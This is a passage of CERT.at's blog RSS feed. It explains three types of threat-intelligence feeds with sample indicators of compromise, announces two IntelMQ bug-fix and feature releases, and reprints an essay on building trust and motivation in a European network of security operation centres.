&lt;li class=&quot;block&quot;&gt;&amp;ldquo;On IP-address A.B.C.D, at time X, we detected a Microsoft Exchange server running a version that is vulnerable to CVE-202X-XXXX&amp;rdquo;.&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&quot;The time-server at IP addres Y can be abused as ddos-reflector.&quot;&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&quot;On IP address Z, there is an unprotected MongoDB reachable from the Internet.&quot;&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p&gt;&lt;strong&gt;Notable points&lt;/strong&gt; are:&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot;&gt;This is very specific information about a concrete system. Usually, it is very clear who is responsible for it.&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;There is no information about an actual compromise of the listed system. The system might be untouched or there may already be a number of webshells deployed on it.&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;There is no information about an attacker.&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;This is sensitive (potentially even GDPR-relevant) information.&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;This information is (almost) useless to anybody but the owners of the system. Well, except for threat actors - that is another reason why we consider this to be sensitive information.&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;Thus, the coordinating CSIRT should pass this information on to the maintainers of this system and to nobody else. CERT.at is usually tagging these events with &amp;ldquo;vulnerable / vulnerable system&amp;rdquo; or &amp;ldquo;vulnerable / potentially unwanted accessible service&amp;rdquo;.&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p class=&quot;block&quot;&gt;&lt;strong&gt;Expected response&lt;/strong&gt; from system owner:&amp;nbsp;&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot;&gt;Mitigate the threat by reconfiguring / patching / upgrading / removing the system or maybe even accept the risk (e.g. &amp;ldquo;yes, we really want to have telnet enabled on that server&amp;rdquo;).&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;Verify that the system has not been breached yet.&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;Type 2: Threat Actor IOCs&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot;&gt;This is the opposite: the information is solely about the threat actor and the resources this group is using, but there is no clear information on the targets. Typical information contained in these IOCs is:&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot;&gt;The domain-name of a command &amp;amp; control (C2) server of the TA&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;An IP address of a C2 server&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;Filename and/or hash of malware used by the TA&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;Email subject, sender and sending IP address of a phishing mail&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;Mutex names, registry-keys or similar artefacts of an infection&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;URL-pattern of C2 connections&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p class=&quot;block&quot;&gt;&lt;strong&gt;Example&lt;/strong&gt;:&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot;&gt;A RAT Remcos campaign was detected 2023-06-14 to use&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot;&gt;Mutex: Rmc-MQTCB0&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;URI: /json.gp&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;Email-attachment: Shipment_order83736383_document_file9387339.7z&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;MD5: 2832aa7272b0e578cd4eda5b9a1f1b12&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;Filename: Shipment_order837363.exe&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p class=&quot;block&quot;&gt;&lt;strong&gt;Notable points&lt;/strong&gt; are:&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot;&gt;This is detailed information about a threat actor infrastructure, tools and procedures.&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;There is often no information about targets of these attacks. Sometimes, some targeting information is known, like &amp;ldquo;This TA usually attacks high-tech companies&amp;rdquo;.&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;This information is potentially useful for everybody who that actor might target.&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;Unless one thinks that attacker IP-addresses deserve GDPR-protection, this data has no privacy implication.&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;Thus, the coordinating CSIRT should pass this information on to all constituents who are capable of operationalizing such CTI. CERT.at is usually not sending this kind of information pro-actively to all constituents, instead we operate a MISP instance which holds these IOCs. Security automation on the side of the constituent is welcome to use the MISP APIs to fetch and process the IOCs.&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;If the targeting of the TA is sufficiently well known and specific, CERT.at will pass on the IOCs directly to the constituent&amp;rsquo;s security team.&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;In rare cases, the TA is abusing infrastructure of one of our constituents. In that case, we have a mix with the next type of CTI.&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p class=&quot;block&quot;&gt;&lt;strong&gt;Expected response&lt;/strong&gt; from system owner:&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot;&gt;Add the IOCs to any sort of incident prevention system, e.g., filter lists in proxies, &lt;a href=&quot;https://en.wikipedia.org/wiki/Endpoint_detection_and_response&quot;&gt;EDR&lt;/a&gt; or AV software.&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;Add the IOCs to the incident detection system, e.g., create suitable rules in &lt;a href=&quot;https://en.wikipedia.org/wiki/Security_information_and_event_management&quot;&gt;SIEMs&lt;/a&gt;.&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;Ideally, also perform a search in old logs for the newly acquired IOCs.&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;Type 3: Infection data&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Sometimes we receive cyber threat information that is very specific and concerns a live incident inside a constituent&amp;rsquo;s network.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;&lt;strong&gt;Examples&lt;/strong&gt; are:&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&amp;ldquo;We detected at timestamp X a webshell placed on a Citrix server. IP-address = A.B.C.D, path = /logon/LogonPoint/uiareas/mac/vkb.php&amp;rdquo;&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&amp;ldquo;Our darknet monitoring detected that someone is selling VPN credentials for user@example.com on the platform X&amp;rdquo;&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&amp;ldquo;After a takedown of botnet X we are monitoring botnet drone connections to the former C2 servers. On [timestamp], the IP address A.B.C.D connected to our sinkhole.&amp;rdquo;&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&amp;ldquo;We managed to get access to the infrastructure of threat actor X. According to the data we found there, your constituent Y is compromised.&amp;rdquo;&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&amp;ldquo;Please find below information on IPs geolocated in your country which are most likely hosting a system infected by SystemBC malware. [&amp;hellip;] Timestamp, IP-address, hostname, c2 ip-address&amp;rdquo;&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&amp;ldquo;There are signs of malicious manipulations on the Website of domain X, there is a phishing page at /images/ino/95788910935578/login.php&amp;rdquo;&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p class=&quot;block&quot;&gt;&lt;strong&gt;Notable points&lt;/strong&gt; are:&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot;&gt;This is usually very specific information about a live incident involving a concrete system.&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;In the best case, the information is good enough to trigger a successful investigation and remediation.&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;The threat actor is often, but not always, named.&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;This is sensitive (potentially even GDPR-relevant) information.&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;This information is (almost) useless to anybody but the owners of the system.&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;This information can be very time-sensitive: a quick reaction can sometimes prevent a ransomware incident.&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;Thus, the coordinating CSIRT should pass this information quickly on to the maintainers of this system and to nobody else. CERT.at is usually tagging these events with &amp;ldquo;intrusions / system-compromise&amp;rdquo; or &amp;ldquo;fraud / phishing&amp;rdquo;&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p class=&quot;block&quot;&gt;&lt;strong&gt;Expected response&lt;/strong&gt; from system owner:&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot;&gt;Start the local incident response process.&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;Clean up the known infection and investigate the possibility of additional compromises in the affected network (lateral movement?).&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;Investigate how the system got comprimised and reconfigure / patch / upgrade / remove the system so that a re-infection via the same vulnerability is no longer possible.&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;h1 class=&quot;block&quot;&gt;Tooling&lt;/h1&gt;&#13;
&lt;p class=&quot;block&quot;&gt;CERT.at is using &lt;a href=&quot;https://github.com/certtools/intelmq&quot;&gt;IntelMQ&lt;/a&gt; to process feeds of type 1 and 3. CTI feeds of type 2 are handled by our &lt;a href=&quot;https://www.misp-project.org/&quot;&gt;MISP&lt;/a&gt; installation.&lt;/p&gt;</description><pubDate>Wed, 06 Sep 2023 17:21:48 GMT+0100</pubDate><guid>https://www.cert.at/en/blog/2023/9/cti-data-feeds</guid><dc:creator>CERT.at</dc:creator><dc:date>2023-09-06T17:21:48Z</dc:date></item><item><title>IntelMQ 3.2.1 bug fix released</title><link>https://www.cert.at/en/blog/2023/8/intelmq-321-bug-fix-released</link><description>&lt;p class=&quot;block&quot;&gt;IntelMQ, an open-source security feeds processing tools, has just got a new release to fix two recently discovered bugs.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;One was introduced in the last 3.2.0 and prevents bots from stopping after being reloaded. As reloading is used in our default configuration for logrotate service, it affects most instances with the IntelMQ 3.2.0. If after the upgrade you still cannot stop your bot, please manually kill the bot's process and start it again.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The second bug was discovered in the Reverse DNS Expert bot, which was incorrectly caching findings for one IP as if they were for the /24-prefixed subnet.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;As usuall, you can get the last IntelMQ from &lt;a title=&quot;Release 3.2.1 on GitHub&quot; href=&quot;https://github.com/certtools/intelmq/releases/tag/3.2.1&quot;&gt;GitHub&lt;/a&gt;, &lt;a title=&quot;IntelMQ 3.2.1 on PyPI&quot; href=&quot;https://pypi.org/project/intelmq/&quot;&gt;PyPI&lt;/a&gt;, &lt;a href=&quot;https://software.opensuse.org/download.html?project=home:sebix:intelmq&amp;amp;package=intelmq&quot;&gt;deb repository&lt;/a&gt; and &lt;a href=&quot;https://hub.docker.com/r/certat/intelmq-full&quot;&gt;Docker Hub&lt;/a&gt;. Unfortunately, the 3.2.x API package for Ubuntu 22.04 is still delayed.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Do not hesitate to share your feedback with the IntelMQ Community on &lt;a href=&quot;https://github.com/certtools/intelmq/issues&quot;&gt;GitHub issues&lt;/a&gt; or the IntelMQ &lt;a href=&quot;https://lists.cert.at/cgi-bin/mailman/listinfo/intelmq-users&quot;&gt;users mailing list&lt;/a&gt;.&lt;/p&gt;&#13;
&lt;hr /&gt;&#13;
&lt;p class=&quot;block&quot;&gt;This blog post is part of a series of blog posts related to our 2020-AT-IA-0254 project, which also support our participation in the CSIRTs Network.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;https://www.cert.at/media/files/EN%20Co-funded%20by%20the%20EU_PANTONE%20%281%29.jpg&quot; width=&quot;100%&quot; /&gt;&lt;/p&gt;</description><pubDate>Tue, 29 Aug 2023 10:53:36 GMT+0100</pubDate><guid>https://www.cert.at/en/blog/2023/8/intelmq-321-bug-fix-released</guid><dc:creator>CERT.at</dc:creator><dc:date>2023-08-29T10:53:36Z</dc:date></item><item><title>IntelMQ 3.2.0 released: Run bots as a library</title><link>https://www.cert.at/en/blog/2023/7/intelmq-320-released-run-bots-as-a-library</link><description>&lt;p class=&quot;block&quot;&gt;We are continuing to support IntelMQ, an open-source solution for collecting and processing security feeds. Recently, the IntelMQ Community announced the release of new version 3.2.0.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;In the new release, IntelMQ received support for running bots as a library, which should allow for better integration with other tools. A significant contribution from our side is rewriting the IntelMQ API to use a modern FastAPI framework.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;As usual, this update contains plenty of bug fixes and enhancements. We have improved the performance of some CLI commands, which was previously reported as a significant issue for larger workflows. The complete changelog and release note are &lt;a title=&quot;IntelMQ 3.2.0 release notes&quot; href=&quot;https://github.com/certtools/intelmq/releases/tag/3.2.0&quot;&gt;available on GitHub&lt;/a&gt;.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;IntelMQ 3.2.0 has already been released on &lt;a title=&quot;Release 3.2.0 on GitHub&quot; href=&quot;https://github.com/certtools/intelmq/releases/tag/3.2.0&quot;&gt;GitHub&lt;/a&gt;, &lt;a title=&quot;IntelMQ 3.2.0 on PyPI&quot; href=&quot;https://pypi.org/project/intelmq/&quot;&gt;PyPI&lt;/a&gt;, and as &lt;a href=&quot;https://software.opensuse.org/download.html?project=home:sebix:intelmq&amp;amp;package=intelmq&quot;&gt;deb packages&lt;/a&gt; and Docker images in the &lt;a href=&quot;https://hub.docker.com/r/certat/intelmq-full&quot;&gt;Docker Hub&lt;/a&gt;. Some packages are delayed (including the API for Ubuntu 22.04) because of packaging issues, and they will follow soon.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;We are thrilled to hear your feedback &amp;ndash; the best place to share your thoughts with the IntelMQ Community is &lt;a href=&quot;https://github.com/certtools/intelmq/issues&quot;&gt;GitHub issues&lt;/a&gt; and the IntelMQ &lt;a href=&quot;https://lists.cert.at/cgi-bin/mailman/listinfo/intelmq-users&quot;&gt;users mailing list&lt;/a&gt;.&lt;/p&gt;&#13;
&lt;hr /&gt;&#13;
&lt;p class=&quot;block&quot;&gt;This blog post is part of a series of blog posts related to our 2020-AT-IA-0254 project, which also support our participation in the CSIRTs Network.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;https://www.cert.at/media/files/EN%20Co-funded%20by%20the%20EU_PANTONE%20%281%29.jpg&quot; width=&quot;100%&quot; /&gt;&lt;/p&gt;</description><pubDate>Tue, 25 Jul 2023 15:34:22 GMT+0100</pubDate><guid>https://www.cert.at/en/blog/2023/7/intelmq-320-released-run-bots-as-a-library</guid><dc:creator>CERT.at</dc:creator><dc:date>2023-07-25T15:34:22Z</dc:date></item><item><title>A Network of SOCs?</title><link>https://www.cert.at/en/blog/2023/7/a-network-of-socs</link><description>&lt;h1 class=&quot;block&quot;&gt;Preface&lt;/h1&gt;&#13;
&lt;p class=&quot;block&quot;&gt;I wrote most of this &lt;strong&gt;text quickly in January 2021&lt;/strong&gt; when the European Commission asked me to apply my lessons learned from the &lt;a href=&quot;https://csirtsnetwork.eu/&quot;&gt;CSIRTs Network&lt;/a&gt; to a potential European Network of SOCs. During 2022, the plans for SOC collaboration have been toned down a bit, the &lt;a href=&quot;https://ec.europa.eu/newsroom/ECCC/items/767258/en&quot;&gt;DIGITAL Europe funding scheme&lt;/a&gt; proposes multiple platforms where SOCs can work together. In 2023, the newly proposed &amp;ldquo;&lt;a href=&quot;https://digital-strategy.ec.europa.eu/en/policies/cyber-solidarity&quot;&gt;Cyber Solidarity Act&lt;/a&gt;&amp;rdquo; builds upon this and codifies the concept of a &amp;ldquo;national SOC&amp;rdquo; and &amp;ldquo;cross-border SOC platforms&amp;rdquo; into an EU regulation.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;At the CSIRTs Network Meeting in Stockholm in June 2023 I gave a presentation on&amp;nbsp; the strenghts and flaws in the CSoA approach. A position paper / blog-post on that is in the works.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The original text (with minor edits) starts below.&lt;/p&gt;&#13;
&lt;h1 class=&quot;block&quot;&gt;Context&lt;/h1&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The NIS Directive established the CSIRTs Network (CNW) in 2016, and the EU Cybersecurity Strategy from 2020 tries to do something similar for SOCs (Security Operation Centres).&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;I was asked by DG-CNECT to provide some lessons identified from the CWN that might be applicable for the SOC Network (SNW).&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The following points are not a fully fleshed out whitepaper, instead they are a number of propositions with short explanations.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The most important point is that &lt;strong&gt;one cannot just focus on the technical aspects of SOC collaboration&lt;/strong&gt;. That is the easy part. We know which tools work. The &lt;a href=&quot;https://github.com/melicertes/docs?linkId=191595424&quot;&gt;same stack that we developed for the CSIRTs Network&lt;/a&gt; can almost 1:1 support SOC networks.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Our colleagues from CCN-CERT presented the &lt;a href=&quot;https://rns.ccn-cert.cni.es/en&quot;&gt;Spanish SOC Network&lt;/a&gt; at various meetings recently. Yes, there was one slide with their MISP setup, but the main content was the administrative side and the incentive structure they built to encourage active participation by all members.&lt;/p&gt;&#13;
&lt;h1 class=&quot;block&quot;&gt;Human Element&lt;/h1&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;Trust&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Any close cooperation needs a basic level of trust between participants. The more sensitive the topic and the more damage could potentially be done by the misuse of information shared between the organisations, the more trust is needed for effective collaboration.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;There must be an understanding that one can rely on others to keep secrets, and to actually communicate if something important for the partner is learned.&lt;/p&gt;&#13;
&lt;h3 class=&quot;block&quot;&gt;Trust is not binary&lt;/h3&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Trust is not a binary thing: There is more than &amp;ldquo;I trust&amp;rdquo; or &amp;ldquo;I don&amp;rsquo;t trust&amp;rdquo;; it always depends on the concrete case if you trust someone enough to cooperate in this instance.&lt;/p&gt;&#13;
&lt;h3 class=&quot;block&quot;&gt;Trust needs Time&lt;/h3&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Some basic level of trust is given to others based on their position (e.g., I trust the baker to sell me edible bread; I trust every police officer to do the basics correctly), but only repeated interactions with the same person/organisation increases the trust over time. (See &amp;ldquo;&lt;a href=&quot;https://en.wikipedia.org/wiki/The_Evolution_of_Cooperation&quot;&gt;The Evolution of Cooperation&lt;/a&gt;&amp;rdquo;)&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Thus, one needs to give all these networks time to establish themselves and the trust relationships.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;These things really take time. We are talking about years.&lt;/p&gt;&#13;
&lt;h3 class=&quot;block&quot;&gt;Physical meetings (incl. social events) help&lt;/h3&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Bringing people together is very helpful to bootstrap cooperation.&lt;/p&gt;&#13;
&lt;h3 class=&quot;block&quot;&gt;You can&amp;rsquo;t legislate Trust&lt;/h3&gt;&#13;
&lt;p class=&quot;block&quot;&gt;There are limited possibilities to declare ex cathedra that one has to trust someone. It might work do certain degree if people are forced by external events to collaborate (e.g., call the police if you have to deal with a significant crime; or reporting requirements to authorities; or hand your kids over to day-care/school/ &amp;hellip;).&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Even in these cases, these organisations have to be very careful about their reputation: misuse of their trust positions will significantly affect how much trust is given, even under duress.&lt;/p&gt;&#13;
&lt;h3 class=&quot;block&quot;&gt;Persons or Teams&lt;/h3&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Trust can be either anchored to persons or to organisations. I might trust a certain barber shop to get my haircut right, but I&amp;rsquo;ll prefer to go the same person if the cutter got it right the last time.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Experience has shown that is possible to establish institutional trust: If I know that Team X is competently run, then I will not hesitate to use the formal contact point of that team.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Still: if something is really sensitive, I will try to reach the buddy working for that other team with whom I have bonded over beer and common incidents.&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;Group Size&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Close cooperation in groups cannot be sustained if the number of participants increases beyond a certain limit. This has been observed in multiple fora, amongst them FIRST, TF-CSIRT, and ops-t (which was actually an experiment in scaling trust groups).&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;As a rule of thumb: whenever you cannot have every member of the group present their current work/topics/ideas/issues during a meeting, then the willingness to have an open sharing decreases significantly. This puts the limit at about 15 to 20 participants. If lower levels of cooperation are acceptable, then group sizes can be larger.&lt;/p&gt;&#13;
&lt;h3 class=&quot;block&quot;&gt;Corollary: Group Splits&lt;/h3&gt;&#13;
&lt;p class=&quot;block&quot;&gt;If a group becomes too big, then there is a chance that core members will split off and create a new, smaller forum for more intense collaboration.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;This is similar to what happens with groups of animals: if one pack becomes too big to be viable, it will split up.&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;Adding members&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Organic growth from within the group works best.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;An external membership process (as in the CNW, where existing members have no say over the inclusion of a new team from another EU Member State) can be very detrimental to the trust inside the group.&lt;/p&gt;&#13;
&lt;h1 class=&quot;block&quot;&gt;Motivation&lt;/h1&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;Cost&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Any level of participation in a network of peers is not free of costs. Nobody in this business has spare time for anything. Even just passive participation via the odd telephone conference or even just reading emails costs time and is thus not free.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Active participation, be it travelling to conferences, working on common projects, manually forwarding information, or setting up Machine to Machine (M2M) communication can carry significant costs. These must not exceed the benefits from the participation in the network.&lt;/p&gt;&#13;
&lt;h3 class=&quot;block&quot;&gt;Corollary: Separate tooling is detrimental to sharing&lt;/h3&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Sharing information into a network must be as low-friction as possible. If an analyst has to re-enter information about an incident in a different interface to share the data, then the chance is high that it will not happen. Optimally, the sharing option is built into the core systems and the overhead of sharing is just selecting with whom.&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;Benefits&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The flip side is often not so easy to quantify: what are the concrete benefits of collaboration? If the bean-counters ask to justify the cost, there should be clear business reasons why the costs are worth it. &amp;ldquo;Interesting discussions&amp;rdquo; and &amp;ldquo;being a good corporate citizen&amp;rdquo; is not a long-term sustainable motivation.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;It must be as clear as possible what value each participant will get from such a network.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Beware of freeloaders and the &amp;ldquo;&lt;a href=&quot;https://en.wikipedia.org/wiki/Tragedy_of_the_commons&quot;&gt;Tragedy of the Commons&lt;/a&gt;&amp;rdquo; effect.&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;Peers&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Networks work best between organisations that are comparable in size, their jobs, and their position in the market. Their technology and informational needs should be roughly the same. They should face similar tasks and challenges. For example, the SOC of VW and the SOC of Renault should have roughly the same job and thus an exchange of experiences and data might be mutually beneficial.&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;Vendor/customer mix can kill networks&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot;&gt;If two members of a network are actually in a vendor/customer relationship in terms of cyber security, then this is a strong detriment to collaboration. Even just a potential sale is tricky: if one member is describing his problem, then someone else should not be in the position to offer his own commercial product of service to address that problem.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;I have seen this work only if the representative of the vendor can clearly differentiate between his role as network partner and his pre-sales job. This is the exception, not the rule.&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;Competition (1)&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Ideally, the member of the network should be in no competition to one another. Example: the security team of Vienna&amp;rsquo;s city hospitals and the equivalent team of the Berlin Charit&amp;eacute; are a best case: their hosting organisations are working in the same sector, but there is absolutely no competition for customers between those two.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;If the hosting organisations are actually competing with each other (see the VW vs. Renault example from above, or different banks), then a cooperation on IT security is not a given. Nevertheless, it is also not impossible, as competitors are often collaborating with respect to lobbying, standardization or interconnection. One positive example I have seen are the Austrian banks, who are cooperating about e-banking security based on the premise that the customers will not differentiate between &amp;ldquo;e-banking at Bank X is insecure&amp;rdquo; and &amp;ldquo;e-banking is insecure&amp;rdquo;.&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;Competition (2)&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Even trickier is the case of SOCs not just protecting the infrastructure of their respective hosting organisation, but also offering their services on a commercial basis to any customer (&amp;ldquo;SOC outsourcing&amp;rdquo;). Anything one SOC shares with the network then potentially helps a direct competitor. Example: both Deloitte and Cap Gemini offer SOC outsourcing and Threat Intel reporting. Their knowledge base is their competitive advantage and why should they share this freely with a competitor when they are selling the same information to a customer?&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Such constellations are extremely difficult, but not impossible to manage.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The trick to deal with competition in such networks is to move the collaboration to a purely operational / technical layer. These people are used to deal with their peers in a productive way.&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;Alignment of interest&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot;&gt;This all boils down to&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot;&gt;Is it a good commercial decision for my SOC to participate in the network?&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;Is it a good commercial decision to share data into the network?&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;Resources&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot;&gt;All members must make the clear management decision to participate in such network and must allocate human power to it. In some way, such networks operate a bit like amateur sport clubs or open-source projects: they thrive based on the voluntary work done by their members. I have seen too many cases where such networks fail simply because members lost interest and did not invest time and effort in running them effectively.&lt;/p&gt;&#13;
&lt;h1 class=&quot;block&quot;&gt;Running a network&lt;/h1&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;Secretariat&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot;&gt;While not strictly necessary, a paid back-office increases the chances of success significantly. Someone has to organize meetings, write minutes, keeps tracks on memberships, produces reports, and provides an external point of contact.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Doing this on a voluntary basis might work for very small and static networks, where a round-robin chair role can succeed.&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;Connecting people&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Bringing people together is the basis foundation of a collaboration network. Only in the case where the network is only the distribution of information from a handful of central sources to all members (i.e., a one-way information flow), then this might not be needed. This can be done by (in order of importance)&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot;&gt;Physical meetings (conferences, workshops, &amp;hellip;)&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;Continuous low-friction instant messaging&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;Mailing-lists&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;Web-Forums&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;h2 style=&quot;text-align: left;&quot;&gt;Generic central tooling&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Any network, regardless of topic, needs a few central tooling components:&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot;&gt;A directory of members (preferably with self-service editing)&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;A file repository&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;An administrative mailing-list&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;A topical mailing-list&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;An instant messaging facility&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
